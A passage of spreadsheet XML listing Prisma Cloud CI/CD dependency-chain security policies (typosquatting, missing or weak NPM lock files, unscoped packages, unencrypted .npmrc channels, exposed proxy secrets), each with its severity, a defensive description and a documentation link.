    </row>
    <row r="220">
      <c r="A220" t="inlineStr"/>
      <c r="B220" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C220" s="2" t="inlineStr"/>
      <c r="D220" t="inlineStr"/>
      <c r="E220" t="inlineStr"/>
      <c r="F220" t="inlineStr"/>
      <c r="G220" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J220" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K220" t="inlineStr">
        <is>
          <t>Possible Python typosquatting detected in an Azure repository</t>
        </is>
      </c>
      <c r="L220" t="inlineStr"/>
      <c r="M220" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N220" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O220" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P220" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q220" t="inlineStr"/>
      <c r="R220" t="inlineStr"/>
      <c r="S220" t="inlineStr"/>
      <c r="T220" t="b">
        <v>0</v>
      </c>
      <c r="U220" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V220" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W220" t="inlineStr">
        <is>
          <t>Typosquatting attacks involve the registration of malicious packages in public registries, using names that closely resemble popular or internal packages used by an organization. The objective is to exploit users' mistakes when typing package names, resulting in the unintentional download of the malicious package. Running malicious packages on developers endpoints or in CI pipelines can lead to credential theft, source code leakage, code tampering and more.</t>
        </is>
      </c>
      <c r="X220" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-python-typosquat-detected</t>
        </is>
      </c>
      <c r="Y220" t="inlineStr"/>
      <c r="Z220" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA220" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB220" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC220" t="inlineStr"/>
      <c r="AD220" t="b">
        <v>1</v>
      </c>
      <c r="AE220" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF220" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>f8b00376-f756-49c1-8188-069fba1d6e1d</t>
        </is>
      </c>
      <c r="AI220" t="inlineStr"/>
      <c r="AJ220" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK220" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" t="inlineStr"/>
      <c r="B221" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C221" s="2" t="inlineStr"/>
      <c r="D221" t="inlineStr"/>
      <c r="E221" t="inlineStr"/>
      <c r="F221" t="inlineStr"/>
      <c r="G221" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J221" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K221" t="inlineStr">
        <is>
          <t>GitHub repository missing NPM lock file</t>
        </is>
      </c>
      <c r="L221" t="inlineStr"/>
      <c r="M221" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N221" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O221" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P221" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q221" t="inlineStr"/>
      <c r="R221" t="inlineStr"/>
      <c r="S221" t="inlineStr"/>
      <c r="T221" t="b">
        <v>0</v>
      </c>
      <c r="U221" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V221" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W221" t="inlineStr">
        <is>
          <t>The package-lock.json file includes information about the dependencies of a package, as well as the hashes of the downloaded packages and the source URLs. This information can be used to verify the integrity of the package installation. If a package-lock.json file is not used when running “npm ci” during the package build process, the packages will be installed without undergoing integrity checks provided by the package-lock.json file. This may lead to the package being tampered, which could potentially result in malicious code being executed in the pipeline or delivered to production.</t>
        </is>
      </c>
      <c r="X221" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-repo-miss-npmlockfile</t>
        </is>
      </c>
      <c r="Y221" t="inlineStr"/>
      <c r="Z221" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA221" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB221" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC221" t="inlineStr"/>
      <c r="AD221" t="b">
        <v>1</v>
      </c>
      <c r="AE221" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF221" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>ed76e646-d1d4-49de-8f23-e7eedb4b6a1e</t>
        </is>
      </c>
      <c r="AI221" t="inlineStr"/>
      <c r="AJ221" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK221" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" t="inlineStr"/>
      <c r="B222" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C222" s="2" t="inlineStr"/>
      <c r="D222" t="inlineStr"/>
      <c r="E222" t="inlineStr"/>
      <c r="F222" t="inlineStr"/>
      <c r="G222" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J222" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K222" t="inlineStr">
        <is>
          <t>Internal NPM package is not scoped in BitBucket repository</t>
        </is>
      </c>
      <c r="L222" t="inlineStr"/>
      <c r="M222" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N222" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O222" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P222" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q222" t="inlineStr"/>
      <c r="R222" t="inlineStr"/>
      <c r="S222" t="inlineStr"/>
      <c r="T222" t="b">
        <v>0</v>
      </c>
      <c r="U222" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V222" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W222" t="inlineStr">
        <is>
          <t>Any third party can publish unscoped packages to the public NPM registry. If the organization does not own the names of the internal packages on the public registry, attackers could potentially upload malicious packages to the registry with identical or similar names, hoping that clients who have not configured their `.npmrc` files to fetch packages from the internal registry will mistakenly download them. Scoping packages in NPM can help protect against \"Dependency Confusion\" and Typosquatting attacks. This is because each NPM user/organization has their own scope, and only the user/organization`s owner can add packages to that scope. As a result, third parties cannot take the package name. Note: The package source displayed in the event field can be specified using one of the following methods described in these examples: • URL: https://registry.npmjs.org/example/-/example-1.0.0.tgz • Git URL: git+ssh://git@github.com/org/repo.git • Local file path: file:../foo/bar • Local linked package: folder/package</t>
        </is>
      </c>
      <c r="X222" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-internal-npm-package-not-scoped-repo</t>
        </is>
      </c>
      <c r="Y222" t="inlineStr"/>
      <c r="Z222" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA222" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB222" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC222" t="inlineStr"/>
      <c r="AD222" t="b">
        <v>1</v>
      </c>
      <c r="AE222" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF222" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>89d73c6b-770f-465c-ba9c-0548a3b7cc46</t>
        </is>
      </c>
      <c r="AI222" t="inlineStr"/>
      <c r="AJ222" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK222" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" t="inlineStr"/>
      <c r="B223" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C223" s="2" t="inlineStr"/>
      <c r="D223" t="inlineStr"/>
      <c r="E223" t="inlineStr"/>
      <c r="F223" t="inlineStr"/>
      <c r="G223" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J223" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K223" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a Bitbucket repository to download dependencies from proxy</t>
        </is>
      </c>
      <c r="L223" t="inlineStr"/>
      <c r="M223" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N223" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O223" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P223" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q223" t="inlineStr"/>
      <c r="R223" t="inlineStr"/>
      <c r="S223" t="inlineStr"/>
      <c r="T223" t="b">
        <v>0</v>
      </c>
      <c r="U223" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V223" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W223" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages through a proxy can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X223" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-unencrypted-channel-download-dependencies-proxy</t>
        </is>
      </c>
      <c r="Y223" t="inlineStr"/>
      <c r="Z223" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA223" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB223" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC223" t="inlineStr"/>
      <c r="AD223" t="b">
        <v>1</v>
      </c>
      <c r="AE223" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF223" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>804297f7-7ae9-489b-b1ce-eb2a0e97300d</t>
        </is>
      </c>
      <c r="AI223" t="inlineStr"/>
      <c r="AJ223" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK223" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" t="inlineStr"/>
      <c r="B224" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C224" s="2" t="inlineStr"/>
      <c r="D224" t="inlineStr"/>
      <c r="E224" t="inlineStr"/>
      <c r="F224" t="inlineStr"/>
      <c r="G224" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J224" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K224" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a GitLab repository to download dependencies from registry</t>
        </is>
      </c>
      <c r="L224" t="inlineStr"/>
      <c r="M224" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N224" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O224" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P224" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q224" t="inlineStr"/>
      <c r="R224" t="inlineStr"/>
      <c r="S224" t="inlineStr"/>
      <c r="T224" t="b">
        <v>0</v>
      </c>
      <c r="U224" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V224" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W224" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages from a registry can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X224" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-unencrypted-channel-download-dependencies-registry</t>
        </is>
      </c>
      <c r="Y224" t="inlineStr"/>
      <c r="Z224" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA224" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB224" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC224" t="inlineStr"/>
      <c r="AD224" t="b">
        <v>1</v>
      </c>
      <c r="AE224" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF224" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>3f0beee4-6e2d-49c2-a8be-0c714a69e8cc</t>
        </is>
      </c>
      <c r="AI224" t="inlineStr"/>
      <c r="AJ224" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK224" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" t="inlineStr"/>
      <c r="B225" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C225" s="2" t="inlineStr"/>
      <c r="D225" t="inlineStr"/>
      <c r="E225" t="inlineStr"/>
      <c r="F225" t="inlineStr"/>
      <c r="G225" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J225" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K225" t="inlineStr">
        <is>
          <t>NPM package lock file verifies integrity with weak hash algorithm (BitBucket)</t>
        </is>
      </c>
      <c r="L225" t="inlineStr"/>
      <c r="M225" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N225" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O225" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P225" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q225" t="inlineStr"/>
      <c r="R225" t="inlineStr"/>
      <c r="S225" t="inlineStr"/>
      <c r="T225" t="b">
        <v>0</v>
      </c>
      <c r="U225" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V225" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W225" t="inlineStr">
        <is>
          <t>Old versions of package-lock.json files using SHA-1 to verify the integrity of downloaded dependencies are vulnerable to collision attacks in which two inputs can produce the same output, meaning that attackers can create a malicious package with the same hash of a legitimate package, bypassing the integrity validation. An attacker who has gained access to a maintainer account could trick a pipeline that uses \"npm ci\" to securely install a package and verify the dependencies integrity by replacing a legitimate package with a malicious version that has the same hash, thereby introducing malicious code which could potentially reach production. Note: Due to SHA-1 vulnerabilities, it was deprecated by NIST in 2011.</t>
        </is>
      </c>
      <c r="X225" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-npm-package-lockfile-weak-hash</t>
        </is>
      </c>
      <c r="Y225" t="inlineStr"/>
      <c r="Z225" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA225" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB225" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC225" t="inlineStr"/>
      <c r="AD225" t="b">
        <v>1</v>
      </c>
      <c r="AE225" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF225" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>d33fddc8-aeb0-4f41-8ab6-6099b68ddd50</t>
        </is>
      </c>
      <c r="AI225" t="inlineStr"/>
      <c r="AJ225" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK225" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" t="inlineStr"/>
      <c r="B226" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C226" s="2" t="inlineStr"/>
      <c r="D226" t="inlineStr"/>
      <c r="E226" t="inlineStr"/>
      <c r="F226" t="inlineStr"/>
      <c r="G226" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J226" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K226" t="inlineStr">
        <is>
          <t>BitBucket repository missing NPM lock file</t>
        </is>
      </c>
      <c r="L226" t="inlineStr"/>
      <c r="M226" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N226" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O226" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P226" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q226" t="inlineStr"/>
      <c r="R226" t="inlineStr"/>
      <c r="S226" t="inlineStr"/>
      <c r="T226" t="b">
        <v>0</v>
      </c>
      <c r="U226" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V226" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W226" t="inlineStr">
        <is>
          <t>The package-lock.json file includes information about the dependencies of a package, as well as the hashes of the downloaded packages and the source URLs. This information can be used to verify the integrity of the package installation. If a package-lock.json file is not used when running \"npm ci\" during the package build process, the packages will be installed without undergoing integrity checks provided by the package-lock.json file. This may lead to the package being tampered, which could potentially result in malicious code being executed in the pipeline or delivered to production.</t>
        </is>
      </c>
      <c r="X226" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-repo-miss-npmlockfile</t>
        </is>
      </c>
      <c r="Y226" t="inlineStr"/>
      <c r="Z226" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA226" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB226" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC226" t="inlineStr"/>
      <c r="AD226" t="b">
        <v>1</v>
      </c>
      <c r="AE226" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF226" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>abbc6362-fcdd-406c-8f99-54863328ba73</t>
        </is>
      </c>
      <c r="AI226" t="inlineStr"/>
      <c r="AJ226" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK226" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" t="inlineStr"/>
      <c r="B227" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C227" s="2" t="inlineStr"/>
      <c r="D227" t="inlineStr"/>
      <c r="E227" t="inlineStr"/>
      <c r="F227" t="inlineStr"/>
      <c r="G227" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J227" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K227" t="inlineStr">
        <is>
          <t>Packages insecurely installed through “npm install” command in Jenkins pipeline</t>
        </is>
      </c>
      <c r="L227" t="inlineStr"/>
      <c r="M227" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N227" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O227" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P227" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q227" t="inlineStr"/>
      <c r="R227" t="inlineStr"/>
      <c r="S227" t="inlineStr"/>
      <c r="T227" t="b">
        <v>0</v>
      </c>
      <c r="U227" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V227" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W227" t="inlineStr">
        <is>
          <t>In common package.json configurations, the \"npm install\" command updates and installs package versions. \"npm install\" doesn`t check for package integrity, allowing attackers who have gained control of a dependency package to upload a malicious version, which is then downloaded and installed automatically when running \"npm install\".</t>
        </is>
      </c>
      <c r="X227" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-npm-install-insecure</t>
        </is>
      </c>
      <c r="Y227" t="inlineStr"/>
      <c r="Z227" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA227" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB227" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC227" t="inlineStr"/>
      <c r="AD227" t="b">
        <v>1</v>
      </c>
      <c r="AE227" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF227" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>8a8bad46-0d1f-43c6-a6ed-373cb347076f</t>
        </is>
      </c>
      <c r="AI227" t="inlineStr"/>
      <c r="AJ227" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK227" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" t="inlineStr"/>
      <c r="B228" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C228" s="2" t="inlineStr"/>
      <c r="D228" t="inlineStr"/>
      <c r="E228" t="inlineStr"/>
      <c r="F228" t="inlineStr"/>
      <c r="G228" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J228" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K228" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a GitLab repository to download dependencies from proxy</t>
        </is>
      </c>
      <c r="L228" t="inlineStr"/>
      <c r="M228" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N228" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O228" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P228" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q228" t="inlineStr"/>
      <c r="R228" t="inlineStr"/>
      <c r="S228" t="inlineStr"/>
      <c r="T228" t="b">
        <v>0</v>
      </c>
      <c r="U228" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V228" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W228" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages through a proxy can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X228" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-unencrypted-channel-download-dependencies-proxy</t>
        </is>
      </c>
      <c r="Y228" t="inlineStr"/>
      <c r="Z228" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA228" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB228" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC228" t="inlineStr"/>
      <c r="AD228" t="b">
        <v>1</v>
      </c>
      <c r="AE228" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF228" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>ec51f1d9-076f-46c9-916e-08f6a561f4bb</t>
        </is>
      </c>
      <c r="AI228" t="inlineStr"/>
      <c r="AJ228" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK228" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" t="inlineStr"/>
      <c r="B229" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C229" s="2" t="inlineStr"/>
      <c r="D229" t="inlineStr"/>
      <c r="E229" t="inlineStr"/>
      <c r="F229" t="inlineStr"/>
      <c r="G229" t="b">
        <v>1</v>
      </c>
      <c r="H2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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J229" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K229" t="inlineStr">
        <is>
          <t>Secret exposed in proxy URL within '.npmrc' file of a GitHub repository</t>
        </is>
      </c>
      <c r="L229" t="inlineStr"/>
      <c r="M229" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N229" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O229" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P229" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q229" t="inlineStr"/>
      <c r="R229" t="inlineStr"/>
      <c r="S229" t="inlineStr"/>
      <c r="T229" t="b">
        <v>0</v>
      </c>
      <c r="U229" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V229" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W229" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. For example, an attacker could use a secret that is used in a proxy configuration, such as the proxy or https-proxy keys, to access a proxy server and then use the proxy server to access restricted organization assets, such as an internal package registry.</t>
        </is>
      </c>
      <c r="X229" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
